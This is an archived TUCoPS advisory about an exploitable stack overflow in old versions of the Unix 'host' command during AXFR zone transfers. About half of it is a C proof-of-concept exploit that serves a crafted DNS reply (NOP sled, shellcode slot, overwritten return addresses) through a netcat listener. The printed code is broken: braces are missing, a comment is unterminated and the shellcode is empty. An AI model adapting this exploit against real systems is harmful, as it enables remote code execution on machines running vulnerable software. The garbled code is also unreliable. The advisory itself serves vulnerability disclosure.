Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: host-1.htm

Host (old versions) Exploitable Buffer Overflow





    'antirez' found following.   Old versions of  the 'host'  command,
    contain an exploitable buffer  overflow.  The version  affected is
    the following:

        static char rcsid[] = "$Id: host.c,v 8.21 1998/03/19 19:31:25 halley Exp $";

    Maybe some  newer version  (but not  the current),  probably older

    The host command can be used to perform the AXFR request to obtain
    the zone transfer of some domain.  UDP DNS messages are limited to
    512 bytes, TCP DNS messages  to 65535 bytes.  Vulnerable  versions
    of the host command perform the AXFR query using TCP but write the
    received data to a  stack allocated buffer of  512 bytes.  If  the
    server send a message bigger than 512 bytes the return address  of
    the function can  be modified.   This can be  reproduced using the
    host command  with the  syntax and  the proof  of concepts exploit
    attached below.

    Proof of concepts exploit:

    /* hostexp.c
     * cc hostexp.c -o hostexp
     * usage: ./hostexp | nc -l -p 53
     * ./host -l -v -t any <fake server>
    #include <stdio.h>
    #include <netinet/in.h>
    int main(void)
	    int offset = 140;
	    unsigned int base = 0xbffff74c+offset, i;
            char shellcode[] = /* 48 bytes, ripped */
	    unsigned short a = htons(1024);
	    char buffer[1026];
	    memcpy(buffer, &a, 2);
	    memset(buffer+2, 'A', 100); /* avoid response processing */
	    memset(buffer+102, 0x90, 100);
	    memcpy(buffer+202, shellcode, 48);
	    for (i = 202+48; i < 202+48+600; i+=4)
		    memcpy(buffer+i, &base, 4);
	    write(fileno(stdout), buffer, 1026);
	    return 0;


    Latest version is bug free.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH